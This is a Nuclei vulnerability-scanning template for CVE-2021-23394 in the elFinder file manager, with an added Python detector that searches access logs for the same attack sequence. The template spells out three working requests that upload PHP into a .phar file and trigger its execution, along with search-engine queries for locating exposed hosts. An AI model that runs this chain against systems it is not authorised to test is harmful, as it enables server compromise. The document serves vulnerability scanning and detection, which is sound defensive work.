studio-42/elfinder before 2.1.58 contains a remote code execution vulnerability: PHP code placed in a .phar file is executed, letting attackers run arbitrary PHP code on the server. The exploit requires the web server to parse .phar files as PHP.
PoC code [public]
id: CVE-2021-23394

info:
  name: elFinder < 2.1.58 - Remote Code Execution
  author: 0xanis
  severity: high
  description: |
    studio-42/elfinder before 2.1.58 contains a remote code execution vulnerability: PHP code placed in a .phar file is executed, letting attackers run arbitrary PHP code on the server. The exploit requires the web server to parse .phar files as PHP.
  impact: |
    Attackers can execute arbitrary PHP code on the server, potentially leading to full server compromise.
  remediation: |
    Update to version 2.1.58 or later.
  reference:
    - https://github.com/Studio-42/elFinder/issues/3295
    - https://blog.sonarsource.com/elfinder-the-story-of-a-file-manager-and-a-bunch-of-vulnerabilities
    - https://snyk.io/vuln/SNYK-PHP-STUDIO42ELFINDER-1290554
    - https://nvd.nist.gov/vuln/detail/CVE-2021-23394
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.1
    cve-id: CVE-2021-23394
    cwe-id: CWE-434
    epss-score: 0.70226
    epss-percentile: 0.9861
    cpe: cpe:2.3:a:std42:elfinder:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: std42
    product: elfinder
    shodan-query: http.title:"elfinder"
    fofa-query: title="elfinder"
    google-query: intitle:"elfinder"
  tags: cve,cve2021,elfinder,rce,phar,file-upload,intrusive,vkev

variables:
  filename: "{{randstr}}"
  payload_str: "{{randstr}}"

http:
  # Request 1: create an empty file whose name is taken from the filename
  # variable above, with a .phar extension; extract the hash elFinder
  # assigns to it for the next request.
  - raw:
      - |
        GET /elFinder/php/connector.minimal.php?cmd=mkfile&target=l1_Lw&name={{filename}}.phar HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json

    matchers:
      - type: dsl
        dsl:
          - contains_all(body, 'isowner', 'createext', 'added')
          - contains(content_type, 'application/json')
          - status_code == 200
        condition: and
        internal: true

    extractors:
      - type: json
        name: hash
        part: body
        json:
          - ".added[0].hash"
        internal: true

  # Request 2: write the PHP marker into the file identified by the hash.
  - raw:
      - |
        GET /elFinder/php/connector.minimal.php?cmd=put&target={{hash}}&content=<?='';+echo+md5('{{payload_str}}');+?> HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json

    matchers:
      - type: dsl
        dsl:
          - contains_all(body, 'isowner', 'phash', 'changed')
          - contains(content_type, 'application/json')
          - status_code == 200
        condition: and
        internal: true

  # Request 3: fetch the file; the md5 marker appears in the body only if
  # the server executed the .phar as PHP.
  - raw:
      - |
        GET /elFinder/files/{{filename}}.phar HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - "{{md5(payload_str)}}"
# digest: 4b0a0048304602210088546ba4c633fb0b6093b0e2a1e3cffdf6efd3d31086aeaacc6acf3dc80bec0d022100ccf24d371080b7aac95735393ba94a472e8acee58af5654ebe7a98694bae0e45:922c64590222798bb761d5b6d8e72950
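As an added defender-side example (not part of the Nuclei template above and not elFinder project code), the following Python script scans web-server access logs for the three-step sequence the template exercises: a `mkfile` through the connector that creates a `.phar` name, a `put` whose `content` parameter carries a PHP open tag, and a later fetch of that same `.phar` from the files directory. The connector path and the `/elFinder/files/` location are taken from the template; the log lines, client addresses, file names and the `detect_phar_chain` naming are constructed for the example, and the script assumes common/combined log format with the parameters in the query string, as the template sends them.

```python
"""Added example (not part of the Nuclei template or of elFinder): flag the
mkfile -> put -> fetch chain for a .phar file in web-server access logs.
Assumes common/combined log format and GET requests with the parameters in
the query string. Every log line below is constructed sample data."""
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlparse

# client address, request line and status code of a common-log-format entry
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample: one client runs the full chain, another only uses
# elFinder normally (creates a text file, opens a directory).
CONSTRUCTED_LOG = """\
203.0.113.7 - - [10/Mar/2024:12:00:01 +0000] "GET /elFinder/php/connector.minimal.php?cmd=mkfile&target=l1_Lw&name=abc123.phar HTTP/1.1" 200 512
203.0.113.7 - - [10/Mar/2024:12:00:02 +0000] "GET /elFinder/php/connector.minimal.php?cmd=put&target=l1_YWJjMTIzLnBoYXI&content=%3C%3F%3D%27%27%3B+echo+md5%28%27x%27%29%3B+%3F%3E HTTP/1.1" 200 480
203.0.113.7 - - [10/Mar/2024:12:00:03 +0000] "GET /elFinder/files/abc123.phar HTTP/1.1" 200 32
198.51.100.9 - - [10/Mar/2024:12:05:00 +0000] "GET /elFinder/php/connector.minimal.php?cmd=mkfile&target=l1_Lw&name=notes.txt HTTP/1.1" 200 510
198.51.100.9 - - [10/Mar/2024:12:05:01 +0000] "GET /elFinder/php/connector.minimal.php?cmd=open&target=l1_Lw HTTP/1.1" 200 2048
"""


def parse_line(line):
    """Return client, path, decoded query parameters and status, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlparse(m["path"])
    return {
        "ip": m["ip"],
        "path": url.path,
        # parse_qs percent-decodes and turns '+' into spaces, so a PHP tag
        # sent as %3C%3F or as a literal <? both come back as "<?"
        "query": {k: v[0] for k, v in parse_qs(url.query).items()},
        "status": int(m["status"]),
    }


def is_connector(path):
    """elFinder PHP connectors are named connector.php, connector.minimal.php, ..."""
    return path.rsplit("/", 1)[-1].startswith("connector") and path.endswith(".php")


def find_phar_chains(log_text):
    """Group successful (HTTP 200) requests per client and report how far each
    client got: stage 1 = created a .phar via mkfile, 2 = also wrote PHP via
    put, 3 = also fetched that .phar from the files directory (the code ran
    if the server maps .phar to the PHP handler)."""
    state = defaultdict(lambda: {"created": set(), "php_put": 0, "fetched": set()})
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None or rec["status"] != 200:
            continue
        s, q = state[rec["ip"]], rec["query"]
        if is_connector(rec["path"]):
            cmd = q.get("cmd")
            if cmd == "mkfile" and q.get("name", "").lower().endswith(".phar"):
                s["created"].add(q["name"])
            elif cmd == "put" and "<?" in q.get("content", ""):
                s["php_put"] += 1
        elif "/files/" in rec["path"] and rec["path"].lower().endswith(".phar"):
            s["fetched"].add(rec["path"].rsplit("/", 1)[-1])

    findings = []
    for ip, s in state.items():
        if not s["created"]:
            continue
        executed = sorted(s["created"] & s["fetched"])
        stage = 3 if executed else (2 if s["php_put"] else 1)
        findings.append({"client": ip, "stage": stage, "created": sorted(s["created"]),
                         "php_put": s["php_put"], "executed": executed})
    return findings


if __name__ == "__main__":
    for f in find_phar_chains(CONSTRUCTED_LOG):
        print(f"{f['client']}: stage {f['stage']} created={f['created']} "
              f"php_put={f['php_put']} executed={f['executed']}")
```

Two caveats for real deployments: access logs only record the request line, so a `put` sent as a POST body (which elFinder also accepts) is invisible here and needs a WAF or full-request log to catch, which is why a stage-1 hit (any `.phar` created through the connector) is already worth an alert on a host that still maps `.phar` to PHP. Besides updating to 2.1.58 or later, removing `.phar` from the web server's PHP handler mapping takes away the precondition the template's description names.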